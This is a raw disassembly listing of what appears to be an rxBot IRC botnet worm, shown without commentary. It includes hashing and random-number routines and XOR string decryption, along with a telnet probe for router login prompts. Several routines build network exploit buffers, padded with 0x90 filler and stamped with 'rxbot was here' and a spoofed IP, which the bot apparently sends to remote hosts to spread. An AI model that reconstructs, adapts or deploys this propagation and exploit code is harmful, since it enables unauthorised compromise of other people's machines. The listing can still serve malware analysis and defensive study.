add ecx, edi
or ebx, ecx
xor ebx, edi
add ebx, [ebp+var_38]
lea ebx, [edx+ebx-70F3336Eh]
mov edx, ebx
shl ebx, 0Ah
shr edx, 16h
or edx, ebx
mov ebx, edi
add edx, ecx
not ebx
or ebx, edx
xor ebx, ecx
add ebx, [ebp+var_1C]
lea ebx, [esi+ebx-100B83h]
mov esi, ebx
shr esi, 11h
shl ebx, 0Fh
or esi, ebx
mov ebx, ecx
add esi, edx
not ebx
or ebx, esi
xor ebx, edx
add ebx, [ebp+var_40]
lea ebx, [edi+ebx-7A7BA22Fh]
mov edi, ebx
shl edi, 15h
shr ebx, 0Bh
or edi, ebx
mov ebx, edx
add edi, esi
not ebx
or ebx, edi
xor ebx, esi
add ebx, [ebp+var_24]
lea ebx, [ecx+ebx+6FA87E4Fh]
mov ecx, ebx
shr ecx, 1Ah
shl ebx, 6
or ecx, ebx
mov ebx, esi
add ecx, edi
not ebx
or ebx, ecx
xor ebx, edi
add ebx, [ebp+var_8]
lea ebx, [edx+ebx-1D31920h]
mov edx, ebx
shr edx, 16h
shl ebx, 0Ah
or edx, ebx
mov ebx, edi
add edx, ecx
not ebx
or ebx, edx
xor ebx, ecx
add ebx, [ebp+var_2C]
lea ebx, [esi+ebx-5CFEBCECh]
loc_40A89A: ; DATA XREF: .data:00414DC0�o
; .data:00414E04�o ...
mov esi, ebx
shr esi, 11h
shl ebx, 0Fh
or esi, ebx
mov ebx, ecx
add esi, edx
not ebx
or ebx, esi
xor ebx, edx
add ebx, [ebp+var_10]
lea ebx, [edi+ebx+4E0811A1h]
mov edi, ebx
shl edi, 15h
shr ebx, 0Bh
or edi, ebx
mov ebx, edx
add edi, esi
not ebx
or ebx, edi
xor ebx, esi
add ebx, [ebp+var_34]
lea ebx, [ecx+ebx-8AC817Eh]
mov ecx, ebx
shr ecx, 1Ah
shl ebx, 6
or ecx, ebx
mov ebx, esi
add ecx, edi
not ebx
or ebx, ecx
xor ebx, edi
add ebx, [ebp+var_18]
lea edx, [edx+ebx-42C50DCBh]
mov ebx, edx
shr ebx, 16h
shl edx, 0Ah
or ebx, edx
mov edx, edi
add ebx, ecx
not edx
or edx, ebx
xor edx, ecx
add edx, [ebp+var_3C]
lea esi, [esi+edx+2AD7D2BBh]
mov edx, esi
shr edx, 11h
shl esi, 0Fh
or edx, esi
mov esi, ecx
add edx, ebx
not esi
or esi, edx
xor esi, ebx
add esi, [ebp+var_20]
lea edi, [edi+esi-14792C6Fh]
mov esi, [eax]
add esi, ecx
mov ecx, edi
shl ecx, 15h
shr edi, 0Bh
or ecx, edi
mov [eax], esi
add ecx, [eax+4]
pop edi
pop esi
add ecx, edx
mov [eax+4], ecx
mov ecx, [eax+8]
add ecx, edx
mov [eax+8], ecx
mov ecx, [eax+0Ch]
add ecx, ebx
pop ebx
mov [eax+0Ch], ecx
leave
retn
sub_40A0BD endp
; =============== S U B R O U T I N E =======================================
sub_40A95D proc near ; CODE XREF: sub_40A0BD+12�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp [esp+arg_8], 0
jbe short locret_40A9A2
mov edx, [esp+arg_4]
mov ecx, [esp+arg_0]
push esi
push edi
push 0FFFFFFFEh
lea eax, [edx+2]
pop esi
sub esi, edx
loc_40A976: ; CODE XREF: sub_40A95D+41�j
movzx edi, byte ptr [eax-1]
xor edx, edx
mov dh, [eax+1]
mov dl, [eax]
add eax, 4
shl edx, 8
or edx, edi
movzx edi, byte ptr [eax-6]
shl edx, 8
or edx, edi
mov [ecx], edx
lea edx, [esi+eax]
add ecx, 4
cmp edx, [esp+8+arg_8]
jb short loc_40A976
pop edi
pop esi
locret_40A9A2: ; CODE XREF: sub_40A95D+5�j
retn
sub_40A95D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9A3 proc near ; CODE XREF: seg000:0041061B�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push 0F0000000h
push 1
push 0
lea eax, [ebp+var_4]
push 0
push eax
call ds:dword_411024 ; CryptAcquireContextA
mov esi, ds:dword_411020
push offset dword_41880C
push 4
push [ebp+var_4]
call esi ; CryptGenRandom
push offset dword_418810
push 4
push [ebp+var_4]
call esi ; CryptGenRandom
push offset dword_418814
push 4
push [ebp+var_4]
call esi ; CryptGenRandom
push offset dword_418818
push 4
push [ebp+var_4]
call esi ; CryptGenRandom
push 0
push [ebp+var_4]
call ds:dword_41101C ; CryptReleaseContext
pop esi
leave
retn
sub_40A9A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AA05 proc near ; CODE XREF: sub_40AADE+3�p sub_40AB05�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
lock xadd dword_41880C, eax
add eax, ebx
lock xadd dword_418810, eax
add eax, ecx
lock xadd dword_418814, eax
add eax, edx
lock xadd dword_418818, eax
add eax, esi
lock xadd dword_41880C, eax
add eax, edi
lock xadd dword_418810, eax
add eax, ebp
lock xadd dword_418814, eax
add eax, esp
lock xadd dword_418818, eax
call sub_41084A ; clock
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
lock xadd dword_41880C, eax
lock xadd dword_418810, eax
lock xadd dword_418814, eax
lock xadd dword_418818, eax
add ecx, ebx
ror ebx, cl
lock xadd dword_418814, ebx
add ecx, ecx
ror ecx, cl
lock xadd dword_418810, ecx
add ecx, edx
ror edx, cl
lock xadd dword_41880C, edx
rol eax, cl
add ecx, eax
ror ebx, cl
add ecx, ebx
ror ecx, cl
add ecx, 211h
rol edx, cl
add ecx, edx
lock xadd dword_418818, edx
lock xadd dword_418814, ecx
lock xadd dword_418810, ebx
lock xadd dword_41880C, eax
pop ebx
leave
retn
sub_40AA05 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AADE proc near ; CODE XREF: sub_401B81+C1�p
; sub_40315E+1B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
call sub_40AA05
call sub_41084A ; clock
lock xadd dword_418818, eax
mov ecx, [ebp+arg_4]
sub ecx, [ebp+arg_0]
xor edx, edx
inc ecx
div ecx
mov eax, edx
add eax, [ebp+arg_0]
pop ebp
retn
sub_40AADE endp
; =============== S U B R O U T I N E =======================================
sub_40AB05 proc near ; CODE XREF: sub_408832:loc_408898�p
; sub_408F9D+8DA�p ...
call sub_40AA05
call sub_41084A ; clock
lock xadd dword_418818, eax
retn
sub_40AB05 endp
; =============== S U B R O U T I N E =======================================
sub_40AB18 proc near ; CODE XREF: sub_40AB46:loc_40AB74�p
; sub_40D700+CE�p
call sub_40AA05
call sub_41084A ; clock
lock xadd dword_418810, eax
and eax, 0FFh
retn
sub_40AB18 endp
; =============== S U B R O U T I N E =======================================
sub_40AB30 proc near ; CODE XREF: sub_408F4C+2B�p
; sub_40B32A+108�p
call sub_40AA05
call sub_41084A ; clock
lock xadd dword_41880C, eax
and eax, 1
retn
sub_40AB30 endp
; =============== S U B R O U T I N E =======================================
sub_40AB46 proc near ; CODE XREF: sub_40735A+5D8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
test ebx, ebx
push esi
jz short loc_40AB7F
mov esi, [esp+8+arg_0]
cmp ebx, 3
jbe short loc_40AB70
push edi
mov edi, ebx
shr edi, 2
loc_40AB5F: ; CODE XREF: sub_40AB46+27�j
call sub_40AB05
mov [esi], eax
add esi, 4
sub ebx, 4
dec edi
jnz short loc_40AB5F
pop edi
loc_40AB70: ; CODE XREF: sub_40AB46+11�j
test ebx, ebx
jbe short loc_40AB7F
loc_40AB74: ; CODE XREF: sub_40AB46+37�j
call sub_40AB18
mov [esi], al
inc esi
dec ebx
jnz short loc_40AB74
loc_40AB7F: ; CODE XREF: sub_40AB46+8�j
; sub_40AB46+2C�j
pop esi
pop ebx
retn
sub_40AB46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AB82 proc near ; CODE XREF: sub_4027CB+32�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
jnz short loc_40AB8F
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40AB8F: ; CODE XREF: sub_40AB82+7�j
mov eax, [ebp+arg_10]
test eax, eax
jnz short loc_40AB99
mov eax, [ebp+arg_4]
loc_40AB99: ; CODE XREF: sub_40AB82+12�j
push edi
push eax
push [ebp+arg_4]
call sub_40AADE
mov edi, eax
pop ecx
test edi, edi
pop ecx
jbe short loc_40ABC7
push ebx
push esi
mov esi, [ebp+arg_0]
mov ebx, edi
loc_40ABB2: ; CODE XREF: sub_40AB82+41�j
push [ebp+arg_C]
push [ebp+arg_8]
call sub_40AADE
mov [esi], al
pop ecx
inc esi
dec ebx
pop ecx
jnz short loc_40ABB2
pop esi
pop ebx
loc_40ABC7: ; CODE XREF: sub_40AB82+27�j
mov eax, edi
pop edi
pop ebp
retn
sub_40AB82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ABCC proc near ; CODE XREF: seg000:0041062D�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push esi
lea eax, [ebp+var_58]
push edi
push eax
call sub_409F29
push [ebp+arg_4]
lea eax, [ebp+var_58]
push [ebp+arg_0]
push eax
call sub_409F51
lea eax, [ebp+var_58]
push eax
push offset byte_418820
call sub_409FF0
add esp, 18h
lea esi, byte_418820
mov edi, esi
push 10h
pop ecx
loc_40AC08: ; CODE XREF: sub_40ABCC+43�j
lodsb
or eax, 80h
stosb
loop loc_40AC08
pop edi
pop esi
leave
retn
sub_40ABCC endp
; =============== S U B R O U T I N E =======================================
sub_40AC15 proc near ; CODE XREF: sub_4049B5+7D�p
; sub_4049B5+FF�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push ebx
push esi
mov bl, [ecx]
cmp bl, 7Fh
ja short loc_40AC4B
xor esi, esi
test bl, bl
jz short loc_40AC4B
push edi
loc_40AC29: ; CODE XREF: sub_40AC15+33�j
mov eax, esi
push 10h
cdq
pop edi
idiv edi
mov al, byte_418820[edx]
xor al, bl
inc esi
mov [ecx], al
mov eax, [esp+0Ch+arg_0]
mov bl, [esi+eax]
lea ecx, [esi+eax]
test bl, bl
jnz short loc_40AC29
pop edi
loc_40AC4B: ; CODE XREF: sub_40AC15+B�j
; sub_40AC15+11�j
pop esi
pop ebx
retn
sub_40AC15 endp
; =============== S U B R O U T I N E =======================================
sub_40AC4E proc near ; CODE XREF: sub_401000+3F�p
; sub_4033B0+19�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push ebx
push esi
mov bl, [ecx]
cmp bl, 7Fh
jbe short loc_40AC84
xor esi, esi
test bl, bl
jz short loc_40AC84
push edi
loc_40AC62: ; CODE XREF: sub_40AC4E+33�j
mov eax, esi
push 10h
cdq
pop edi
idiv edi
mov al, byte_418820[edx]
xor al, bl
inc esi
mov [ecx], al
mov eax, [esp+0Ch+arg_0]
mov bl, [esi+eax]
lea ecx, [esi+eax]
test bl, bl
jnz short loc_40AC62
pop edi
loc_40AC84: ; CODE XREF: sub_40AC4E+B�j
; sub_40AC4E+11�j
pop esi
pop ebx
retn
sub_40AC4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AC87 proc near ; DATA XREF: .data:00416A88�o
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, 200h
push 2710h
lea eax, [ebp+var_200]
push edi
push eax
push dword ptr [esi+3Eh]
call sub_403DAD
add esp, 10h
test eax, eax
jz short loc_40AD27
push 0Ch
lea eax, [ebp+var_200]
push offset dword_4140E0
push eax
call sub_410AFA ; memcmp
add esp, 0Ch
test eax, eax
jnz short loc_40AD27
lea eax, [ebp+var_200]
push edi
push eax
push dword ptr [esi+3Eh]
call sub_403D69
add esp, 0Ch
test eax, eax
jz short loc_40AD27
lea eax, [ebp+var_200]
push offset aUserAccessVeri ; "\r\n\r\nUser Access Verification\r\n\r\nPasswor"...
push eax
call sub_410AEE ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40AD27
mov eax, [esi]
inc dword ptr [eax+2Ah]
lea eax, [esi+42h]
push eax
mov eax, [esi]
add esi, 4
push dword ptr [eax+2Ah]
push offset aTelnet ; "telnet"
push esi
push offset unk_414074
push offset dword_4177EC
call sub_408CDE
add esp, 18h
loc_40AD27: ; CODE XREF: sub_40AC87+2D�j
; sub_40AC87+47�j ...
pop edi
pop esi
leave
retn
sub_40AC87 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AD2B proc near ; CODE XREF: sub_40AE3D+5A�p
var_1000 = byte ptr -1000h
var_FF8 = byte ptr -0FF8h
var_FF4 = byte ptr -0FF4h
var_FDB = byte ptr -0FDBh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_4108B0
push ebx
push esi
mov ebx, 0EA60h
push edi
push ebx
push [ebp+arg_0]
call sub_403DD6
mov esi, ds:dword_411258
pop ecx
test eax, eax
pop ecx
mov edi, 1000h
jz short loc_40AD7A
push 0
lea eax, [ebp+var_1000]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
test eax, eax
jz loc_40AE36
cmp eax, 0FFFFFFFFh
jz loc_40AE36
loc_40AD7A: ; CODE XREF: sub_40AD2B+2D�j
push 28h
push offset dword_4140F0
push [ebp+arg_0]
call sub_403D54
push ebx
push [ebp+arg_0]
call sub_403DD6
add esp, 14h
test eax, eax
jz loc_40AE36
push 0
lea eax, [ebp+var_1000]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
test eax, eax
jz loc_40AE36
cmp eax, 0FFFFFFFFh
jz short loc_40AE36
lea eax, [ebp+var_FDB]
push eax
call sub_41088C ; atoi
cmp [ebp+var_FF8], 5
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
jnz short loc_40AE23
cmp [ebp+var_FF4], 0
jnz short loc_40ADEF
xor ecx, ecx
cmp eax, 4
setle cl
dec ecx
and ecx, 0FFFFFFFEh
inc ecx
inc ecx
loc_40ADEB: ; CODE XREF: sub_40AD2B+DC�j
; sub_40AD2B+F6�j ...
mov eax, ecx
jmp short loc_40AE38
; ---------------------------------------------------------------------------
loc_40ADEF: ; CODE XREF: sub_40AD2B+B0�j
cmp [ebp+var_FF4], 1
jnz short loc_40AE09
xor ecx, ecx
cmp eax, 2
setle cl
dec ecx
and ecx, 0FFFFFFFDh
add ecx, 3
jmp short loc_40ADEB
; ---------------------------------------------------------------------------
loc_40AE09: ; CODE XREF: sub_40AD2B+CB�j
cmp [ebp+var_FF4], 2
jnz short loc_40AE36
xor ecx, ecx
cmp eax, 3
setle cl
dec ecx
and ecx, 0FFFFFFFCh
add ecx, 4
jmp short loc_40ADEB
; ---------------------------------------------------------------------------
loc_40AE23: ; CODE XREF: sub_40AD2B+A7�j
cmp [ebp+var_FF8], 4
jnz short loc_40AE36
xor ecx, ecx
cmp eax, 6
setle cl
jmp short loc_40ADEB
; ---------------------------------------------------------------------------
loc_40AE36: ; CODE XREF: sub_40AD2B+40�j
; sub_40AD2B+49�j ...
xor eax, eax
loc_40AE38: ; CODE XREF: sub_40AD2B+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_40AD2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AE3D proc near ; DATA XREF: .data:004169A0�o
var_1204 = byte ptr -1204h
var_1004 = byte ptr -1004h
var_F37 = byte ptr -0F37h
var_E02 = byte ptr -0E02h
var_E00 = dword ptr -0E00h
var_DFC = byte ptr -0DFCh
var_BF2 = byte ptr -0BF2h
var_A2C = byte ptr -0A2Ch
var_928 = byte ptr -928h
var_518 = byte ptr -518h
var_414 = byte ptr -414h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1204h
call sub_4108B0
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push 3
push offset asc_412214 ; "\r\n"
push dword ptr [esi+2Ah]
lea eax, [esi+146h]
push eax
lea eax, [esi+0C6h]
push eax
lea eax, [ebp+var_1204]
push dword ptr [esi+0C2h]
push 200h
push eax
call sub_40D700
mov edi, eax
add esp, 20h
test edi, edi
jz loc_40B005
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
push dword ptr [esi+3Eh]
call sub_40AD2B
pop ecx
mov [ebp+var_4], eax
test eax, eax
pop ecx
jz loc_40B005
mov ebx, 1000h
lea eax, [ebp+var_1004]
push ebx
push 0
push eax
call sub_410850 ; memset
push 2
lea eax, [ebp+var_1004]
push offset dword_4141C4
push eax
call sub_410838 ; memcpy
push 1F4h
lea eax, [ebp+var_F37]
push 90h
push eax
call sub_410850 ; memset
lea eax, [ebp+var_1204]
push edi
push eax
lea eax, [ebp+var_DFC]
push eax
call sub_410838 ; memcpy
push 5
lea eax, [ebp+var_BF2]
push offset aRxbot ; "rxbot"
push eax
call sub_410838 ; memcpy
push 0Eh
lea eax, [ebp+var_A2C]
push offset aRxbotWasHere ; "rxbot was here"
push eax
call sub_410838 ; memcpy
add esp, 48h
lea eax, [ebp+var_928]
push 11h
push offset a121204131313 ; "12/12/04 13:13:13"
push eax
call sub_410838 ; memcpy
push 0Eh
lea eax, [ebp+var_518]
push offset aRxbot_paradise ; "rxbot_paradise"
push eax
call sub_410838 ; memcpy
push 10h
lea eax, [ebp+var_414]
push offset a131_131_131_13 ; "131.131.131.131"
push eax
call sub_410838 ; memcpy
mov edi, offset loc_41416C
push edi
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_108]
push edi
push eax
call sub_410838 ; memcpy
push 2
lea eax, [ebp+var_E02]
push offset loc_414168
push eax
call sub_410838 ; memcpy
add esp, 40h
cmp [ebp+var_4], 1
jnz short loc_40AF9D
mov eax, [ebp+arg_0]
mov eax, dword_41411C[eax*4]
jmp short loc_40AFC8
; ---------------------------------------------------------------------------
loc_40AF9D: ; CODE XREF: sub_40AE3D+152�j
cmp [ebp+var_4], 2
jnz short loc_40AFAF
mov eax, [ebp+arg_0]
mov eax, dword_414138[eax*4]
jmp short loc_40AFC8
; ---------------------------------------------------------------------------
loc_40AFAF: ; CODE XREF: sub_40AE3D+164�j
cmp [ebp+var_4], 3
mov eax, [ebp+arg_0]
jnz short loc_40AFC1
mov eax, dword_41414C[eax*4]
jmp short loc_40AFC8
; ---------------------------------------------------------------------------
loc_40AFC1: ; CODE XREF: sub_40AE3D+179�j
mov eax, dword_414158[eax*4]
loc_40AFC8: ; CODE XREF: sub_40AE3D+15E�j
; sub_40AE3D+170�j ...
mov [ebp+var_E00], eax
lea eax, [ebp+var_1004]
push ebx
push eax
push dword ptr [esi+3Eh]
call sub_403D54
push 0EA60h
push dword ptr [esi+3Eh]
call sub_403DD6
add esp, 14h
test eax, eax
jz short loc_40B005
push 0
lea eax, [ebp+var_1004]
push ebx
push eax
push dword ptr [esi+3Eh]
call ds:dword_411258 ; recv
loc_40B005: ; CODE XREF: sub_40AE3D+49�j
; sub_40AE3D+66�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40AE3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B00A proc near ; CODE XREF: seg000:0040B177�p
var_1000 = byte ptr -1000h
var_FF8 = byte ptr -0FF8h
var_FF4 = byte ptr -0FF4h
var_FDB = byte ptr -0FDBh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_4108B0
push ebx
push esi
mov ebx, 0EA60h
push edi
push ebx
push [ebp+arg_0]
call sub_403DD6
mov esi, ds:dword_411258
pop ecx
test eax, eax
pop ecx
mov edi, 1000h
jz short loc_40B059
push 0
lea eax, [ebp+var_1000]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
test eax, eax
jz loc_40B115
cmp eax, 0FFFFFFFFh
jz loc_40B115
loc_40B059: ; CODE XREF: sub_40B00A+2D�j
push 28h
push offset dword_4141C8
push [ebp+arg_0]
call sub_403D54
push ebx
push [ebp+arg_0]
call sub_403DD6
add esp, 14h
test eax, eax
jz loc_40B115
push 0
lea eax, [ebp+var_1000]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
test eax, eax
jz loc_40B115
cmp eax, 0FFFFFFFFh
jz short loc_40B115
lea eax, [ebp+var_FDB]
push eax
call sub_41088C ; atoi
cmp [ebp+var_FF8], 5
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
jnz short loc_40B102
cmp [ebp+var_FF4], 0
jnz short loc_40B0CE
xor ecx, ecx
cmp eax, 4
setle cl
dec ecx
and ecx, 0FFFFFFFEh
inc ecx
inc ecx
loc_40B0CA: ; CODE XREF: sub_40B00A+DC�j
; sub_40B00A+F6�j ...
mov eax, ecx
jmp short loc_40B117
; ---------------------------------------------------------------------------
loc_40B0CE: ; CODE XREF: sub_40B00A+B0�j
cmp [ebp+var_FF4], 1
jnz short loc_40B0E8
xor ecx, ecx
cmp eax, 2
setle cl
dec ecx
and ecx, 0FFFFFFFDh
add ecx, 3
jmp short loc_40B0CA
; ---------------------------------------------------------------------------
loc_40B0E8: ; CODE XREF: sub_40B00A+CB�j
cmp [ebp+var_FF4], 2
jnz short loc_40B115
xor ecx, ecx
cmp eax, 3
setle cl
dec ecx
and ecx, 0FFFFFFFCh
add ecx, 4
jmp short loc_40B0CA
; ---------------------------------------------------------------------------
loc_40B102: ; CODE XREF: sub_40B00A+A7�j
cmp [ebp+var_FF8], 4
jnz short loc_40B115
xor ecx, ecx
cmp eax, 6
setle cl
jmp short loc_40B0CA
; ---------------------------------------------------------------------------
loc_40B115: ; CODE XREF: sub_40B00A+40�j
; sub_40B00A+49�j ...
xor eax, eax
loc_40B117: ; CODE XREF: sub_40B00A+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_40B00A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 1204h
call sub_4108B0
push ebx
push esi
mov esi, [ebp+8]
push edi
push 3
push offset asc_412214 ; "\r\n"
push dword ptr [esi+2Ah]
lea eax, [esi+146h]
push eax
lea eax, [esi+0C6h]
push eax
lea eax, [ebp-204h]
push dword ptr [esi+0C2h]
push 200h
push eax
call sub_40D700
add esp, 20h
mov [ebp-4], eax
test eax, eax
jz loc_40B278
and dword ptr [ebp+8], 0
lea eax, [ebp+8]
push eax
push dword ptr [esi+3Eh]
call sub_40B00A
mov ebx, eax
pop ecx
test ebx, ebx
pop ecx
jz loc_40B278
mov edi, 1000h
lea eax, [ebp-1204h]
push edi
push 0
push eax
call sub_410850 ; memset
push 2
lea eax, [ebp-1204h]
push offset dword_4141C4
push eax
call sub_410838 ; memcpy
push 8
lea eax, [ebp-1137h]
push offset dword_414218
push eax
call sub_410838 ; memcpy
push dword ptr [ebp-4]
lea eax, [ebp-204h]
push eax
lea eax, [ebp-112Fh]
push eax
call sub_410838 ; memcpy
push 20h
lea eax, [ebp-0FFCh]
push offset dword_4141F4
push eax
call sub_410838 ; memcpy
push 2
lea eax, [ebp-1002h]
push offset loc_414168
push eax
call sub_410838 ; memcpy
add esp, 48h
cmp ebx, 1
jnz short loc_40B212
mov eax, [ebp+8]
mov eax, dword_414224[eax*4]
jmp short loc_40B23B
; ---------------------------------------------------------------------------
loc_40B212: ; CODE XREF: seg000:0040B204�j
cmp ebx, 2
jnz short loc_40B223
mov eax, [ebp+8]
mov eax, dword_414240[eax*4]
jmp short loc_40B23B
; ---------------------------------------------------------------------------
loc_40B223: ; CODE XREF: seg000:0040B215�j
mov eax, [ebp+8]
cmp ebx, 3
jnz short loc_40B234
mov eax, dword_414254[eax*4]
jmp short loc_40B23B
; ---------------------------------------------------------------------------
loc_40B234: ; CODE XREF: seg000:0040B229�j
mov eax, dword_414260[eax*4]
loc_40B23B: ; CODE XREF: seg000:0040B210�j
; seg000:0040B221�j ...
mov [ebp-1000h], eax
lea eax, [ebp-1204h]
push edi
push eax
push dword ptr [esi+3Eh]
call sub_403D54
push 0EA60h
push dword ptr [esi+3Eh]
call sub_403DD6
add esp, 14h
test eax, eax
jz short loc_40B278
push 0
lea eax, [ebp-1204h]
push edi
push eax
push dword ptr [esi+3Eh]
call ds:dword_411258 ; recv
loc_40B278: ; CODE XREF: seg000:0040B166�j
; seg000:0040B182�j ...
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B27D proc near ; DATA XREF: .data:off_416796�o
var_1800 = byte ptr -1800h
var_800 = byte ptr -800h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1800h
call sub_4108B0
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push 1
lea eax, [esi+42h]
push eax
call sub_40C794
push eax
lea eax, [ebp+var_800]
push eax
push esi
call sub_40B32A
add esp, 14h
mov [ebp+arg_0], eax
test eax, eax
jz short loc_40B325
push 48h
push offset dword_414270
push dword ptr [esi+3Eh]
call sub_403D54
push 0EA60h
push dword ptr [esi+3Eh]
call sub_403DD6
add esp, 14h
test eax, eax
jz short loc_40B325
mov edi, ds:dword_411258
mov ebx, 1000h
push 0
lea eax, [ebp+var_1800]
push ebx
push eax
push dword ptr [esi+3Eh]
call edi ; recv
push [ebp+arg_0]
lea eax, [ebp+var_800]
push eax
push dword ptr [esi+3Eh]
call sub_403D54
push 0EA60h
push dword ptr [esi+3Eh]
call sub_403DD6
add esp, 14h
test eax, eax
jz short loc_40B325
push 0
lea eax, [ebp+var_1800]
push ebx
push eax
push dword ptr [esi+3Eh]
call edi ; recv
loc_40B325: ; CODE XREF: sub_40B27D+34�j
; sub_40B27D+57�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40B27D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B32A proc near ; CODE XREF: sub_40B27D+27�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
mov eax, [ebp+arg_0]
push 7
push offset dword_4146F0
push dword ptr [eax+2Ah]
lea ecx, [eax+146h]
push ecx
lea ecx, [eax+0C6h]
push ecx
push dword ptr [eax+0C2h]
lea eax, [ebp+var_200]
push 200h
push eax
call sub_40D700
add esp, 20h
mov [ebp+arg_0], eax
test eax, eax
jnz short loc_40B371
leave
retn
; ---------------------------------------------------------------------------
loc_40B371: ; CODE XREF: sub_40B32A+43�j
push ebx
push esi
push edi
add eax, 0D7h
push 10h
mov ebx, 0B3h
cdq
pop ecx
idiv ecx
push 0Ch
pop eax
sub eax, edx
jns short loc_40B38E
add ebx, 10h
loc_40B38E: ; CODE XREF: sub_40B32A+5F�j
mov esi, [ebp+arg_4]
push 360h
push offset dword_4142F0
push esi
sub ebx, edx
call sub_410838 ; memcpy
lea eax, [esi+360h]
push 10h
push offset dword_414654
push eax
call sub_410838 ; memcpy
push 30h
lea eax, [esi+370h]
push offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
push eax
call sub_410838 ; memcpy
push ebx
lea eax, [esi+3A0h]
push 0FFFFFF90h
push eax
call sub_410850 ; memset
push [ebp+arg_0]
lea edi, [ebx+3A0h]
lea eax, [ebp+var_200]
push eax
lea eax, [edi+esi]
push eax
call sub_410838 ; memcpy
add edi, [ebp+arg_0]
push 3Ch
push offset aC1234561111111 ; "\\C$\\123456111111111111111.doc"
lea eax, [edi+esi]
push eax
call sub_410838 ; memcpy
add esp, 48h
add edi, 3Ch
push 30h
lea eax, [edi+esi]
push offset dword_4146A8
push eax
call sub_410838 ; memcpy
mov eax, [ebp+arg_8]
add esp, 0Ch
add edi, 30h
dec eax
lea ecx, [esi+394h]
jz short loc_40B464
dec eax
jz short loc_40B45B
dec eax
jz short loc_40B452
call sub_40AB30
test eax, eax
push 4
jz short loc_40B444
push offset dword_4146E8
jmp short loc_40B449
; ---------------------------------------------------------------------------
loc_40B444: ; CODE XREF: sub_40B32A+111�j
push offset dword_4146EC
loc_40B449: ; CODE XREF: sub_40B32A+118�j
lea eax, [esi+394h]
push eax
jmp short loc_40B46C
; ---------------------------------------------------------------------------
loc_40B452: ; CODE XREF: sub_40B32A+106�j
push 4
push offset dword_4146E4
jmp short loc_40B46B
; ---------------------------------------------------------------------------
loc_40B45B: ; CODE XREF: sub_40B32A+103�j
push 4
push offset dword_4146E0
jmp short loc_40B46B
; ---------------------------------------------------------------------------
loc_40B464: ; CODE XREF: sub_40B32A+100�j
push 4
push offset dword_4146DC
loc_40B46B: ; CODE XREF: sub_40B32A+12F�j
; sub_40B32A+138�j
push ecx
loc_40B46C: ; CODE XREF: sub_40B32A+126�j
call sub_410838 ; memcpy
mov eax, [ebp+arg_0]
add esp, 0Ch
lea eax, [ebx+eax+30h]
lea ecx, [eax-0Ch]
add [esi+8], ecx
lea ecx, [eax-0Ch]
add [esi+10h], ecx
lea ecx, [eax-0Ch]
add [esi+80h], ecx
lea ecx, [eax-0Ch]
add [esi+84h], ecx
lea ecx, [eax-0Ch]
add [esi+0B4h], ecx
lea ecx, [eax-0Ch]
add [esi+0B8h], ecx
lea ecx, [eax-0Ch]
add [esi+0D0h], ecx
lea ecx, [eax-0Ch]
add [esi+18Ch], ecx
cdq
sub eax, edx
sar eax, 1
add [esi+360h], eax
